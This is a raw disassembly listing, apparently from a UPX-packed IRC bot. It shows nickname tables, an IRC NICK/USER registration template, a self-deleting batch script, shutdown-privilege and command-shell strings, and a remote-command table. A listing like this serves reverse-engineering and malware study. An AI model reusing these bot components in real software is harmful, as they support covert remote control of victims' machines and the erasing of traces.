dd offset dword_438E7C
dd offset dword_438E78
dd offset aC ; "c"
dd offset aV ; "v"
dd offset dword_438E74
dd offset aN ; "n"
dd offset aM ; "m"
dd offset dword_438E70
dd offset dword_438E6C
dd offset dword_438E68
dd offset dword_438E64
dd offset dword_438E60
dd offset word_438E5C
dd offset dword_438E58
dd offset aI_0 ; "I"
dd offset dword_438E54
dd offset dword_438E50
dd offset aA_0 ; "A"
dd offset dword_438E4C
dd offset dword_438E48
dd offset dword_438E44
dd offset dword_438E40
dd offset dword_438E3C
dd offset dword_438E38
dd offset dword_438E34
dd offset dword_438E30
dd offset dword_438E2C
dd offset dword_438E28
dd offset dword_438E24
dd offset dword_438E20
dd offset dword_438E1C
dd offset word_438E18
dd offset aM_0 ; "M"
dd offset aSmartmir ; "SMARTMIR"
dd offset aFarooq ; "farooq"
dd offset aMaxxguy ; "maxxguy"
dd offset aBobmarley ; "BOBMARLEY"
dd offset aEmilya ; "emilya"
dd offset aKrizha ; "KRIZHA"
dd offset aCar1nna ; "Car1nna"
dd offset aSwin ; "swin"
dd offset aMale ; "male"
dd offset aKoko ; "koko"
dd offset aFlexster ; "flexster"
dd offset aKen ; "ken"
dd offset aShez ; "Shez"
dd offset aTalika ; "talika"
dd offset aMarcy ; "marcy"
dd offset aCme ; "cme"
dd offset aHeval ; "heval"
dd offset aBunty ; "bunty"
dd offset aJanno ; "janno"
dd offset aRimpy ; "rimpy"
dd offset aNastysha ; "nastysha"
dd offset aLuisa ; "Luisa"
dd offset aTroller ; "troller"
dd offset aManee ; "manee"
dd offset aKermit ; "kermit"
dd offset aPuregold ; "puregold"
dd offset aCoredump ; "CoreDump"
dd offset aImra ; "imra"
dd offset aGirl ; "GirL"
dd offset aCamel ; "CAMEL"
dd offset aReshma ; "reshma"
dd offset aKencing ; "Kencing"
dd offset aThr45h3r5 ; "THR45H3R5"
dd offset aCansuuuu ; "cansuuuu"
dd offset aKaan38dent ; "kaan38dent"
dd offset aErkan27 ; "erkan27"
dd offset aHexaaa ; "hexaaa"
dd offset aBerk19 ; "berk19"
dd offset aObenibisevse ; "OBeNiBiSeVSe"
dd offset aIrmal ; "irmal"
dd offset aMisssunday ; "misssunday"
dd offset aTolga34 ; "Tolga34"
dd offset aJericho ; "JERICHO"
dd offset aMary_0 ; "MARY"
dd offset aAkin ; "AKIN"
dd offset aMelekk ; "melekk"
dd offset aTrend3 ; "trend3"
dd offset aMERVE ; "M-E-R-V-E"
dd offset aTekir ; "tekir"
dd offset aVenedik34 ; "venedik34"
dd offset aSevmekmi ; "sevmekmi"
dd offset aSudenur ; "SUDENUR"
dd offset aArzu ; "ARZU"
dd offset aHaticem ; "haticem"
dd offset aErnesto ; "ERNESTO"
dd offset aAslii ; "aslii"
dd offset aPiramit ; "PIRAMIT"
dd offset aSamyeli21 ; "samyeli21"
dd offset aRetg ; "RETG"
dd offset aBlackpearl ; "blackpearl"
dd offset aPelincik ; "pelincik"
dd offset aAhmet ; "ahmet"
dd offset aTurkyy ; "turkyy"
dd offset aAnk32m ; "ank32m"
dd offset aZack ; "ZACK"
dd offset aIzmir39m ; "Izmir39m"
dd offset aAlbina ; "albina"
dd offset dword_438BB0
dd offset off_438BAC
dd offset aAnkh ; "ankh"
dd offset aDonjuanm ; "Donjuanm"
dd offset aBogac ; "bogac"
dd offset aAlpay34m ; "alpay34m"
dd offset aCongueror ; "CoNGuERoR"
dd offset aDenizlim ; "DenizliM"
dd offset aBerk19m ; "Berk19m"
dd offset aDevran ; "devran"
dd offset aArda ; "arda"
dd offset aKeyiflisert ; "keyifliSERT"
dd offset aMurat34M ; "murat34-m"
dd offset aHakan3 ; "hakan3"
dd offset aImirzali ; "IMIRZALI--"
dd offset aRamtha ; "RAMTHA"
dd offset aEmre ; "Emre--"
dd offset aElmaazyok ; "elmaazyok"
dd offset aEsmerkiz ; "Esmerkiz"
dd offset aKebikec ; "kebikec"
dd offset aFlord ; "FLoRD"
dd offset aHoly ; "holy"
dd offset aMahinur ; "MAHINUR"
dd offset aSadikaellesme ; "SaDIkaEllesme"
dd offset aAykut1 ; "aykut1"
dd offset aKashmira ; "Kashmira"
dd offset aSeviseli ; "SeViSeLi"
dd offset aSugarboy ; "SUGARBOY-"
dd offset aUzgun36 ; "uzgun36"
dd offset aKumul ; "kumul"
dd offset aAdalim ; "ADALIM"
dd offset aUmut ; "umut-"
dd offset aAnk32M ; "ANK-32-M"
dd offset aDjspace ; "DJSPACE"
dd offset aAnkar ; "Ankar"
dd offset aFenerlee ; "FeNeRLee"
dd offset aHayran ; "hayran"
dd offset aAngelgirl ; "angelgirl"
dd offset aKapk ; "kapk"
dd offset aAchilles ; "Achilles"
dd offset aTegmen ; "TEGMEN"
dd offset aKotan ; "kotan"
dd offset aSevda ; "sevda"
dd offset off_438A18
dd offset aAlcatras ; "alcatras"
dd offset aA44m ; "a44m"
dd offset aBirsen ; "birsen"
dd offset aYabanc ; "yabanc"
dd offset aDevre ; "devre"
dd offset aErkan ; "erkan"
dd offset aAnkm ; "ankM"
dd offset aAdem28 ; "Adem28"
dd offset aMaxsilla ; "maxsilla"
dd offset aM41ist ; "M41IST"
dd offset aAdamm33 ; "AdAMM33"
dd offset aFirtina ; "firtina"
dd offset aAta29 ; "Ata29"
dd offset aKoray ; "KORAY"
dd offset aAkden ; "akden"
dd offset aIzmirlm ; "izmirlm"
dd offset aUla ; "ula"
dd offset aNeHaber ; "NE-HABER"
dd offset aPassenger ; "passenger"
dd offset aTropikal ; "tropikal"
dd offset aCool30m ; "cool30m"
dd offset aCem39 ; "cem39"
dd offset aRerpjj ; "RERPJJ"
dd offset aTeoman ; "TEOMAN```"
dd offset aDallas43m ; "DALLAS43M"
dd offset aPrometheus ; "prometheus"
dd offset aMaveRIck ; "MaVe{R}icK"
dd offset aAdamm ; "ADAMM"
dd offset aCumhur29 ; "cumhur29"
dd offset aWantedlove ; "WANTEDLOVE"
off_4385E8 dd offset aSex ; DATA XREF: sub_417ADE+41�r
; sub_417ADE+EC�r
; "sex"
dd offset aLez ; "lez"
dd offset aZex ; "zex"
dd offset aTree ; "tree"
dd offset aBad ; "bad"
dd offset aLag ; "lag"
dd offset aTambe ; "|tambe|"
dd offset aWoh ; "|woh|"
dd offset aTot ; "-|tot|"
dd offset aSuck ; "|suck|"
dd offset aLuck ; "|luck|"
dd offset aHub ; "{hub}"
dd offset aSex_0 ; "{sex}"
dd offset aGens ; "{gens|"
dd offset aLuvuF ; "||luvu-f|"
dd offset aWiked ; "|wiked|"
dd offset aSick ; "sick}}"
dd offset aQ8 ; "Q8"
dd offset aQ8A ; "|q8|a"
dd offset dword_438E74
dd offset aC ; "c"
dd offset aD ; "d"
dd offset aE ; "e"
dd offset dword_438E88
dd offset dword_438E84
dd offset dword_438E80
dd offset aI ; "i"
dd offset dword_42BBFC
dd offset aJ ; "j"
dd offset aK ; "k"
dd offset asc_42CE54 ; "l"
dd offset aM ; "m"
dd offset aN ; "n"
dd offset aO ; "o"
dd offset aP ; "p"
dd offset aQ ; "q"
dd offset aRs ; "rs"
dd offset aT ; "t"
dd offset aU ; "u"
dd offset aV ; "v"
dd offset dword_438E90
dd offset dword_438E78
dd offset dword_438E8C
dd offset dword_438E7C
dd offset aHappy ; "happy"
dd offset aRg ; "rg"
dd offset aTy ; "ty"
dd offset aGf ; "gf"
dd offset aRt ; "rt"
dd offset aSdf ; "sdf"
dd offset aUi ; "ui"
dd offset aLuvy ; "luvy"
dd offset aTrimy ; "trimy"
dd offset aTruck ; "truck"
dd offset aMuckc ; "muckc"
dd offset dword_438E7C
dd offset dword_438E84
dd offset aS_1 ; "s"
dd offset aQ ; "q"
dd offset off_438838
dd offset aBbl ; "|bbl"
dd offset byte_43D808
dd offset byte_43D808
dd offset a___0 ; "_|_"
dd offset byte_43D808
dd offset byte_43D808
dd offset byte_43D808
dd offset byte_43D808
dd offset dword_438E44
dd offset aM_0 ; "M"
dd offset aLuvu ; "LUVU"
dd offset aSad ; "Sad"
dd offset aF_2 ; "^^^f^"
dd offset dword_438E74
dd offset byte_43D808
dd offset aSleeping ; "Sleeping"
dd offset byte_43D808
dd offset byte_43D808
dd offset aFuck_0 ; "Fuck"
dd offset aFree ; "Free"
dd offset byte_43D808
dd offset byte_43D808
dd offset dword_438E28
dd offset byte_43D808
dd offset aBoy ; "BOY"
dd offset aGirl_0 ; "GIRL"
dd offset aGurl ; "gurl"
dd offset aShit ; "shit"
dd offset aAha ; "aha"
dd offset aYeah ; "yeah"
dd offset aMuha ; "muha"
dd offset aMof0 ; "mof0"
dd offset aMofo ; "mofo"
dd offset dword_4387B8
dd offset dword_4387B4
dd offset dword_4387AC
dd offset dword_4387A0
dd offset dword_438798
dd offset dword_438790
dd offset dword_438788
dd offset dword_438784
dd offset dword_438780
dword_438780 dd 7536h ; DATA XREF: UPX0:0043877C�o
dword_438784 dd 7535h ; DATA XREF: UPX0:00438778�o
dword_438788 dd 7C75347Ch, 0 ; DATA XREF: UPX0:00438774�o
dword_438790 dd 6F79347Bh, 7D75h ; DATA XREF: UPX0:00438770�o
dword_438798 dd 7375347Ch, 7Ch ; DATA XREF: UPX0:0043876C�o
dword_4387A0 dd 7865737Ch, 65726634h, 7C65h ; DATA XREF: UPX0:00438768�o
dword_4387AC dd 6F6C6F6Ch, 7C617Ch ; DATA XREF: UPX0:00438764�o
dword_4387B4 dd 6C6F6Ch ; DATA XREF: UPX0:00438760�o
dword_4387B8 dd 746F74h ; DATA XREF: UPX0:0043875C�o
aMofo db 'mofo',0 ; DATA XREF: UPX0:00438758�o
align 4
aMof0 db 'mof0',0 ; DATA XREF: UPX0:00438754�o
align 4
aMuha db 'muha',0 ; DATA XREF: UPX0:00438750�o
align 4
aYeah db 'yeah',0 ; DATA XREF: UPX0:0043874C�o
align 4
aAha db 'aha',0 ; DATA XREF: UPX0:00438748�o
aShit db 'shit',0 ; DATA XREF: UPX0:00438744�o
align 4
aGurl db 'gurl',0 ; DATA XREF: UPX0:00438740�o
align 10h
aGirl_0 db 'GIRL',0 ; DATA XREF: UPX0:0043873C�o
align 4
aBoy db 'BOY',0 ; DATA XREF: UPX0:00438738�o
aFree db 'Free',0 ; DATA XREF: UPX0:00438724�o
align 4
aFuck_0 db 'Fuck',0 ; DATA XREF: UPX0:00438720�o
align 4
aSleeping db 'Sleeping',0 ; DATA XREF: UPX0:00438714�o
align 4
aF_2 db '^^^f^',0 ; DATA XREF: UPX0:00438708�o
align 10h
aSad db 'Sad',0 ; DATA XREF: UPX0:00438704�o
aLuvu db 'LUVU',0 ; DATA XREF: UPX0:00438700�o
align 4
a___0 db '_|_',0 ; DATA XREF: UPX0:004386E4�o
aBbl db '|bbl',0 ; DATA XREF: UPX0:004386D8�o
align 4
off_438838 dd offset loc_425242 ; DATA XREF: UPX0:004386D4�o
aMuckc db 'muckc',0 ; DATA XREF: UPX0:004386C0�o
align 4
aTruck db 'truck',0 ; DATA XREF: UPX0:004386BC�o
align 4
aTrimy db 'trimy',0 ; DATA XREF: UPX0:004386B8�o
align 4
aLuvy db 'luvy',0 ; DATA XREF: UPX0:004386B4�o
align 4
aUi db 'ui',0 ; DATA XREF: UPX0:004386B0�o
align 10h
aSdf db 'sdf',0 ; DATA XREF: UPX0:004386AC�o
aRt db 'rt',0 ; DATA XREF: UPX0:004386A8�o
align 4
aGf db 'gf',0 ; DATA XREF: UPX0:004386A4�o
align 4
aTy db 'ty',0 ; DATA XREF: UPX0:004386A0�o
align 10h
aRg db 'rg',0 ; DATA XREF: UPX0:0043869C�o
align 4
aHappy db 'happy',0 ; DATA XREF: UPX0:00438698�o
align 4
aRs db 'rs',0 ; DATA XREF: UPX0:00438678�o
align 10h
aQ8A db '|q8|a',0 ; DATA XREF: UPX0:00438630�o
align 4
aQ8 db 'Q8',0 ; DATA XREF: UPX0:0043862C�o
align 4
aSick db 'sick}}',0 ; DATA XREF: UPX0:00438628�o
align 4
aWiked db '|wiked|',0 ; DATA XREF: UPX0:00438624�o
aLuvuF db '||luvu-f|',0 ; DATA XREF: UPX0:00438620�o
align 4
aGens db '{gens|',0 ; DATA XREF: UPX0:0043861C�o
align 10h
aSex_0 db '{sex}',0 ; DATA XREF: UPX0:00438618�o
align 4
aHub db '{hub}',0 ; DATA XREF: UPX0:00438614�o
align 10h
aLuck db '|luck|',0 ; DATA XREF: UPX0:00438610�o
align 4
aSuck db '|suck|',0 ; DATA XREF: UPX0:0043860C�o
align 10h
aTot db '-|tot|',0 ; DATA XREF: UPX0:00438608�o
align 4
aWoh db '|woh|',0 ; DATA XREF: UPX0:00438604�o
align 10h
aTambe db '|tambe|',0 ; DATA XREF: UPX0:00438600�o
aLag db 'lag',0 ; DATA XREF: UPX0:004385FC�o
aBad db 'bad',0 ; DATA XREF: UPX0:004385F8�o
aTree db 'tree',0 ; DATA XREF: UPX0:004385F4�o
align 4
aZex db 'zex',0 ; DATA XREF: UPX0:004385F0�o
aLez db 'lez',0 ; DATA XREF: UPX0:004385EC�o
aWantedlove db 'WANTEDLOVE',0 ; DATA XREF: UPX0:004385E4�o
align 4
aCumhur29 db 'cumhur29',0 ; DATA XREF: UPX0:004385E0�o
align 4
aAdamm db 'ADAMM',0 ; DATA XREF: UPX0:004385DC�o
align 10h
aMaveRIck db 'MaVe{R}icK',0 ; DATA XREF: UPX0:004385D8�o
align 4
aPrometheus db 'prometheus',0 ; DATA XREF: UPX0:004385D4�o
align 4
aDallas43m db 'DALLAS43M',0 ; DATA XREF: UPX0:004385D0�o
align 4
aTeoman db 'TEOMAN```',0 ; DATA XREF: UPX0:004385CC�o
align 10h
aRerpjj db 'RERPJJ',0 ; DATA XREF: UPX0:004385C8�o
align 4
aCem39 db 'cem39',0 ; DATA XREF: UPX0:004385C4�o
align 10h
aCool30m db 'cool30m',0 ; DATA XREF: UPX0:004385C0�o
aTropikal db 'tropikal',0 ; DATA XREF: UPX0:004385BC�o
align 4
aPassenger db 'passenger',0 ; DATA XREF: UPX0:004385B8�o
align 10h
aNeHaber db 'NE-HABER',0 ; DATA XREF: UPX0:004385B4�o
align 4
aUla db 'ula',0 ; DATA XREF: UPX0:004385B0�o
aIzmirlm db 'izmirlm',0 ; DATA XREF: UPX0:004385AC�o
aAkden db 'akden',0 ; DATA XREF: UPX0:004385A8�o
align 10h
aKoray db 'KORAY',0 ; DATA XREF: UPX0:004385A4�o
align 4
aAta29 db 'Ata29',0 ; DATA XREF: UPX0:004385A0�o
align 10h
aFirtina db 'firtina',0 ; DATA XREF: UPX0:0043859C�o
aAdamm33 db 'AdAMM33',0 ; DATA XREF: UPX0:00438598�o
aM41ist db 'M41IST',0 ; DATA XREF: UPX0:00438594�o
align 4
aMaxsilla db 'maxsilla',0 ; DATA XREF: UPX0:00438590�o
align 4
aAdem28 db 'Adem28',0 ; DATA XREF: UPX0:0043858C�o
align 4
aAnkm db 'ankM',0 ; DATA XREF: UPX0:00438588�o
align 4
aErkan db 'erkan',0 ; DATA XREF: UPX0:00438584�o
align 4
aDevre db 'devre',0 ; DATA XREF: UPX0:00438580�o
align 4
aYabanc db 'yabanc',0 ; DATA XREF: UPX0:0043857C�o
align 4
aBirsen db 'birsen',0 ; DATA XREF: UPX0:00438578�o
align 4
aA44m db 'a44m',0 ; DATA XREF: UPX0:00438574�o
align 4
aAlcatras db 'alcatras',0 ; DATA XREF: UPX0:00438570�o
align 4
off_438A18 dd offset byte_4B5245 ; DATA XREF: UPX0:0043856C�o
aSevda db 'sevda',0 ; DATA XREF: UPX0:00438568�o
align 4
aKotan db 'kotan',0 ; DATA XREF: UPX0:00438564�o
align 4
aTegmen db 'TEGMEN',0 ; DATA XREF: UPX0:00438560�o
align 4
aAchilles db 'Achilles',0 ; DATA XREF: UPX0:0043855C�o
align 10h
aKapk db 'kapk',0 ; DATA XREF: UPX0:00438558�o
align 4
aAngelgirl db 'angelgirl',0 ; DATA XREF: UPX0:00438554�o
align 4
aHayran db 'hayran',0 ; DATA XREF: UPX0:00438550�o
align 4
aFenerlee db 'FeNeRLee',0 ; DATA XREF: UPX0:0043854C�o
align 4
aAnkar db 'Ankar',0 ; DATA XREF: UPX0:00438548�o
align 10h
aDjspace db 'DJSPACE',0 ; DATA XREF: UPX0:00438544�o
aAnk32M db 'ANK-32-M',0 ; DATA XREF: UPX0:00438540�o
align 4
aUmut db 'umut-',0 ; DATA XREF: UPX0:0043853C�o
align 4
aAdalim db 'ADALIM',0 ; DATA XREF: UPX0:00438538�o
align 4
aKumul db 'kumul',0 ; DATA XREF: UPX0:00438534�o
align 4
aUzgun36 db 'uzgun36',0 ; DATA XREF: UPX0:00438530�o
aSugarboy db 'SUGARBOY-',0 ; DATA XREF: UPX0:0043852C�o
align 10h
aSeviseli db 'SeViSeLi',0 ; DATA XREF: UPX0:00438528�o
align 4
aKashmira db 'Kashmira',0 ; DATA XREF: UPX0:00438524�o
align 4
aAykut1 db 'aykut1',0 ; DATA XREF: UPX0:00438520�o
align 10h
aSadikaellesme db 'SaDIkaEllesme',0 ; DATA XREF: UPX0:0043851C�o
align 10h
aMahinur db 'MAHINUR',0 ; DATA XREF: UPX0:00438518�o
aHoly db 'holy',0 ; DATA XREF: UPX0:00438514�o
align 10h
aFlord db 'FLoRD',0 ; DATA XREF: UPX0:00438510�o
align 4
aKebikec db 'kebikec',0 ; DATA XREF: UPX0:0043850C�o
aEsmerkiz db 'Esmerkiz',0 ; DATA XREF: UPX0:00438508�o
align 4
aElmaazyok db 'elmaazyok',0 ; DATA XREF: UPX0:00438504�o
align 4
aEmre db 'Emre--',0 ; DATA XREF: UPX0:00438500�o
align 10h
aRamtha db 'RAMTHA',0 ; DATA XREF: UPX0:004384FC�o
align 4
aImirzali db 'IMIRZALI--',0 ; DATA XREF: UPX0:004384F8�o
align 4
aHakan3 db 'hakan3',0 ; DATA XREF: UPX0:004384F4�o
align 4
aMurat34M db 'murat34-m',0 ; DATA XREF: UPX0:004384F0�o
align 4
aKeyiflisert db 'keyifliSERT',0 ; DATA XREF: UPX0:004384EC�o
aArda db 'arda',0 ; DATA XREF: UPX0:004384E8�o
align 4
aDevran db 'devran',0 ; DATA XREF: UPX0:004384E4�o
align 4
aBerk19m db 'Berk19m',0 ; DATA XREF: UPX0:004384E0�o
aDenizlim db 'DenizliM',0 ; DATA XREF: UPX0:004384DC�o
align 4
aCongueror db 'CoNGuERoR',0 ; DATA XREF: UPX0:004384D8�o
align 4
aAlpay34m db 'alpay34m',0 ; DATA XREF: UPX0:004384D4�o
align 10h
aBogac db 'bogac',0 ; DATA XREF: UPX0:004384D0�o
align 4
aDonjuanm db 'Donjuanm',0 ; DATA XREF: UPX0:004384CC�o
align 4
aAnkh db 'ankh',0 ; DATA XREF: UPX0:004384C8�o
align 4
off_438BAC dd offset byte_457441 ; DATA XREF: UPX0:004384C4�o
dword_438BB0 dd 414C5941h, 2Dh ; DATA XREF: UPX0:004384C0�o
aAlbina db 'albina',0 ; DATA XREF: UPX0:004384BC�o
align 10h
aIzmir39m db 'Izmir39m',0 ; DATA XREF: UPX0:004384B8�o
align 4
aZack db 'ZACK',0 ; DATA XREF: UPX0:004384B4�o
align 4
aAnk32m db 'ank32m',0 ; DATA XREF: UPX0:004384B0�o
align 4
aTurkyy db 'turkyy',0 ; DATA XREF: UPX0:004384AC�o
align 4
aAhmet db 'ahmet',0 ; DATA XREF: UPX0:004384A8�o
align 4
aPelincik db 'pelincik',0 ; DATA XREF: UPX0:004384A4�o
align 4
aBlackpearl db 'blackpearl',0 ; DATA XREF: UPX0:004384A0�o
align 4
aRetg db 'RETG',0 ; DATA XREF: UPX0:0043849C�o
align 4
aSamyeli21 db 'samyeli21',0 ; DATA XREF: UPX0:00438498�o
align 4
aPiramit db 'PIRAMIT',0 ; DATA XREF: UPX0:00438494�o
aAslii db 'aslii',0 ; DATA XREF: UPX0:00438490�o
align 4
aErnesto db 'ERNESTO',0 ; DATA XREF: UPX0:0043848C�o
aHaticem db 'haticem',0 ; DATA XREF: UPX0:00438488�o
aArzu db 'ARZU',0 ; DATA XREF: UPX0:00438484�o
align 10h
aSudenur db 'SUDENUR',0 ; DATA XREF: UPX0:00438480�o
aSevmekmi db 'sevmekmi',0 ; DATA XREF: UPX0:0043847C�o
align 4
aVenedik34 db 'venedik34',0 ; DATA XREF: UPX0:00438478�o
align 10h
aTekir db 'tekir',0 ; DATA XREF: UPX0:00438474�o
align 4
aMERVE db 'M-E-R-V-E',0 ; DATA XREF: UPX0:00438470�o
align 4
aTrend3 db 'trend3',0 ; DATA XREF: UPX0:0043846C�o
align 4
aMelekk db 'melekk',0 ; DATA XREF: UPX0:00438468�o
align 4
aAkin db 'AKIN',0 ; DATA XREF: UPX0:00438464�o
align 4
aMary_0 db 'MARY',0 ; DATA XREF: UPX0:00438460�o
align 4
aJericho db 'JERICHO',0 ; DATA XREF: UPX0:0043845C�o
aTolga34 db 'Tolga34',0 ; DATA XREF: UPX0:00438458�o
aMisssunday db 'misssunday',0 ; DATA XREF: UPX0:00438454�o
align 10h
aIrmal db 'irmal',0 ; DATA XREF: UPX0:00438450�o
align 4
aObenibisevse db 'OBeNiBiSeVSe',0 ; DATA XREF: UPX0:0043844C�o
align 4
aBerk19 db 'berk19',0 ; DATA XREF: UPX0:00438448�o
align 10h
aHexaaa db 'hexaaa',0 ; DATA XREF: UPX0:00438444�o
align 4
aErkan27 db 'erkan27',0 ; DATA XREF: UPX0:00438440�o
aKaan38dent db 'kaan38dent',0 ; DATA XREF: UPX0:0043843C�o
align 4
aCansuuuu db 'cansuuuu',0 ; DATA XREF: UPX0:00438438�o
align 4
aThr45h3r5 db 'THR45H3R5',0 ; DATA XREF: UPX0:00438434�o
align 4
aKencing db 'Kencing',0 ; DATA XREF: UPX0:00438430�o
aReshma db 'reshma',0 ; DATA XREF: UPX0:0043842C�o
align 4
aCamel db 'CAMEL',0 ; DATA XREF: UPX0:00438428�o
align 4
aGirl db 'GirL',0 ; DATA XREF: UPX0:00438424�o
align 4
aImra db 'imra',0 ; DATA XREF: UPX0:00438420�o
align 4
aCoredump db 'CoreDump',0 ; DATA XREF: UPX0:0043841C�o
align 4
aPuregold db 'puregold',0 ; DATA XREF: UPX0:00438418�o
align 4
aKermit db 'kermit',0 ; DATA XREF: UPX0:00438414�o
align 4
aManee db 'manee',0 ; DATA XREF: UPX0:00438410�o
align 4
aTroller db 'troller',0 ; DATA XREF: UPX0:0043840C�o
aLuisa db 'Luisa',0 ; DATA XREF: UPX0:00438408�o
align 4
aNastysha db 'nastysha',0 ; DATA XREF: UPX0:00438404�o
align 10h
aRimpy db 'rimpy',0 ; DATA XREF: UPX0:00438400�o
align 4
aJanno db 'janno',0 ; DATA XREF: UPX0:004383FC�o
align 10h
aBunty db 'bunty',0 ; DATA XREF: UPX0:004383F8�o
align 4
aHeval db 'heval',0 ; DATA XREF: UPX0:004383F4�o
align 10h
aCme db 'cme',0 ; DATA XREF: UPX0:004383F0�o
aMarcy db 'marcy',0 ; DATA XREF: UPX0:004383EC�o
align 4
aTalika db 'talika',0 ; DATA XREF: UPX0:004383E8�o
align 4
aShez db 'Shez',0 ; DATA XREF: UPX0:004383E4�o
align 4
aKen db 'ken',0 ; DATA XREF: UPX0:004383E0�o
aFlexster db 'flexster',0 ; DATA XREF: UPX0:004383DC�o
align 4
aKoko db 'koko',0 ; DATA XREF: UPX0:004383D8�o
align 4
aMale db 'male',0 ; DATA XREF: UPX0:004383D4�o
align 4
aSwin db 'swin',0 ; DATA XREF: UPX0:004383D0�o
align 4
aCar1nna db 'Car1nna',0 ; DATA XREF: UPX0:004383CC�o
aKrizha db 'KRIZHA',0 ; DATA XREF: UPX0:004383C8�o
align 4
aEmilya db 'emilya',0 ; DATA XREF: UPX0:004383C4�o
align 4
aBobmarley db 'BOBMARLEY',0 ; DATA XREF: UPX0:004383C0�o
align 4
aMaxxguy db 'maxxguy',0 ; DATA XREF: UPX0:004383BC�o
aFarooq db 'farooq',0 ; DATA XREF: UPX0:004383B8�o
align 4
aSmartmir db 'SMARTMIR',0 ; DATA XREF: UPX0:004383B4�o
align 4
aM_0: ; DATA XREF: UPX0:004383B0�o
; UPX0:004386FC�o
unicode 0, <M>,0
word_438E18 dw 4Eh ; DATA XREF: sub_419E7A+38�r
; UPX0:004383AC�o
align 4
dword_438E1C dd 42h ; DATA XREF: UPX0:004383A8�o
dword_438E20 dd 56h ; DATA XREF: UPX0:004383A4�o
dword_438E24 dd 43h ; DATA XREF: UPX0:004383A0�o
dword_438E28 dd 58h ; DATA XREF: UPX0:0043839C�o
; UPX0:00438730�o
dword_438E2C dd 5Ah ; DATA XREF: UPX0:00438398�o
dword_438E30 dd 4Ch ; DATA XREF: UPX0:00438394�o
dword_438E34 dd 4Bh ; DATA XREF: UPX0:00438390�o
dword_438E38 dd 4Ah ; DATA XREF: UPX0:0043838C�o
dword_438E3C dd 48h ; DATA XREF: UPX0:00438388�o
dword_438E40 dd 47h ; DATA XREF: UPX0:00438384�o
dword_438E44 dd 46h ; DATA XREF: UPX0:00438380�o
; UPX0:004386F8�o
dword_438E48 dd 44h ; DATA XREF: UPX0:0043837C�o
dword_438E4C dd 53h ; DATA XREF: UPX0:00438378�o
dword_438E50 dd 50h ; DATA XREF: UPX0:00438370�o
dword_438E54 dd 4Fh ; DATA XREF: UPX0:0043836C�o
dword_438E58 dd 55h ; DATA XREF: UPX0:00438364�o
word_438E5C dw 59h ; DATA XREF: sub_41A19E+38�r
; UPX0:00438360�o
align 10h
dword_438E60 dd 54h ; DATA XREF: UPX0:0043835C�o
dword_438E64 dd 52h ; DATA XREF: UPX0:00438358�o
dword_438E68 dd 45h ; DATA XREF: UPX0:00438354�o
dword_438E6C dd 57h ; DATA XREF: UPX0:00438350�o
dword_438E70 dd 51h ; DATA XREF: UPX0:0043834C�o
dword_438E74 dd 62h ; DATA XREF: UPX0:00438340�o
; UPX0:00438634�o ...
dword_438E78 dd 78h ; DATA XREF: UPX0:00438334�o
; UPX0:0043868C�o
dword_438E7C dd 7Ah ; DATA XREF: UPX0:00438330�o
; UPX0:00438694�o ...
dword_438E80 dd 68h ; DATA XREF: UPX0:00438320�o
; UPX0:0043864C�o
dword_438E84 dd 67h ; DATA XREF: UPX0:0043831C�o
; UPX0:00438648�o ...
dword_438E88 dd 66h ; DATA XREF: UPX0:00438318�o
; UPX0:00438644�o
dword_438E8C dd 79h ; DATA XREF: UPX0:004382FC�o
; UPX0:00438690�o
dword_438E90 dd 77h ; DATA XREF: UPX0:004382EC�o
; UPX0:00438688�o
dword_438E94 dd 4B43494Eh, 0A732520h, 0 ; DATA XREF: sub_4177D0+B1�o
dword_438EA0 dd 323334h ; DATA XREF: sub_4177D0+79�o
dword_438EA4 dd 474E4F50h, 0A732520h, 0 ; DATA XREF: sub_4177D0+61�o
aNickSUserSHotm db 'NICK %s',0Ah ; DATA XREF: sub_4178BB+9B�o
db 'USER %s "hotmail.com" "127.0.0.1" :%s',0Ah,0
align 10h
a__0 db '-|`_\{[]}',0 ; DATA XREF: sub_417ADE+BC�o
; sub_417ADE+175�r ...
align 4
dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 3000005h, 10h, 18h, 1, 3 dup(0)
; ---------------------------------------------------------------------------
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_41814D+72�o
align 10h
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_418294+1C�o
align 10h
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_418338+2�o
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_41835A+140�o
align 4
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_41835A+85�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_41835A+48�o
align 4
unk_43901C db 2Dh ; - ; DATA XREF: sub_4184E2+9C�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aOperatingSyste db '- operating system is not supported',0
align 4
unk_43904C db 2Dh ; - ; DATA XREF: sub_4184E2+8F�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aFailedWithErro db '- failed with error code %d',0
align 4
dword_439074 dd 234032Dh, 2676F6Ch, 25202D03h, 6F6C2073h, 6C632067h
; DATA XREF: sub_4184E2+5C�o
dd 65726165h, 64h
off_439090 dd offset aAdd ; DATA XREF: sub_4186C2+60�r
; sub_418A99+51�r ...
; "Add"
off_439094 dd offset aAdded ; DATA XREF: sub_4186C2+2D�r
; sub_418A99+83�r ...
; "Added"
dword_439098 dd 0 ; DATA XREF: sub_4186C2+18�r
dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
align 8
dd offset aList_1 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 10h
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 439104h, 4390FCh, 2, 4390F0h, 4390E4h, 3, 746E6F43h
dd 65756E69h, 64h, 746E6F43h, 65756E69h, 0
aPaused db 'Paused',0
align 4
aPause_0 db 'Pause',0
align 4
